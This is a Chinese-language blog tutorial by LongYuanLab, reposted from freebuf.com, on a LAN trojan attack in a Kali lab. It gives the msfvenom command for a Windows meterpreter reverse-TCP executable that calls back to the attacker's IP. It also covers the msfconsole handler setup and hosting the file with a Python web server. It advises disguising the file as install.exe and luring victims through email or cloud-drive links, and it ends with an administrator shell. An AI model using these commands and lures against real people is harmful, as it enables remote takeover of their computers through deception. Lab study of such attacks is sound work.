基于局域网渗透攻击之木马攻击 – 作者:龙渊实验室LongYuanLab

使用kali生成木马文件,创建一个简易的web服务器,将木马文件伪装成install.exe类型的安装文件,诱使被攻击者点击木马文件,从而getshell。

准备环境

攻击机(kali):192.168.29.130

被攻击机(window server 2008 SP2):192.168.29.135

1、攻击机(kali)使用msfvenom 生成 payloadmsfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.29.130 LPORT=4444 -f exe > /xx.exe图片[1]-基于局域网渗透攻击之木马攻击 – 作者:龙渊实验室LongYuanLab-安全小百科2.kali攻击机打开msfconsoleuse exploit/multi/handler      //使用攻击模块set payload windows/meterpreter/reverse_tcp    //设置攻击载荷,建立反弹连接set LHOST 192.168.29.130       //设置源IP(攻击机IP)set LPORT 4444            //设置源端口(攻击机未被占用端口)show options             //查看配置选项(选填,可查看未配置选项)图片[2]-基于局域网渗透攻击之木马攻击 – 作者:龙渊实验室LongYuanLab-安全小百科图片[3]-基于局域网渗透攻击之木马攻击 – 作者:龙渊实验室LongYuanLab-安全小百科3.实施攻击操作图片[4]-基于局域网渗透攻击之木马攻击 – 作者:龙渊实验室LongYuanLab-安全小百科4.kali攻击机将木马文件拷贝到指定目录图片[5]-基于局域网渗透攻击之木马攻击 – 作者:龙渊实验室LongYuanLab-安全小百科5.在该目录下面搭建一个简易的web服务器。命令:python -m SimpleHTTPServer 80图片[6]-基于局域网渗透攻击之木马攻击 – 作者:龙渊实验室LongYuanLab-安全小百科6.查看被攻击者的IP地址详情

图片[7]-基于局域网渗透攻击之木马攻击 – 作者:龙渊实验室LongYuanLab-安全小百科

7.被攻击者访问链接http://192.168.29.130/如下图,访问http://192.168.29.130/xx.exe即可直接下载木马文件(可以将URL放在邮件中发送给攻击者,或者放在网盘中添加指定内容诱使被攻击者点击,并且将exe文件名称修改为install.exe等类似安装文件进行伪装)图片[8]-基于局域网渗透攻击之木马攻击 – 作者:龙渊实验室LongYuanLab-安全小百科8.被攻击者将木马文件下载到本地图片[9]-基于局域网渗透攻击之木马攻击 – 作者:龙渊实验室LongYuanLab-安全小百科9.被攻击者双击木马文件后,攻击机kali得到一个会话,并且是最高administrator权限图片[10]-基于局域网渗透攻击之木马攻击 – 作者:龙渊实验室LongYuanLab-安全小百科原文链接

来源:freebuf.com 2020-08-18 10:07:58 by: 龙渊实验室LongYuanLab

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论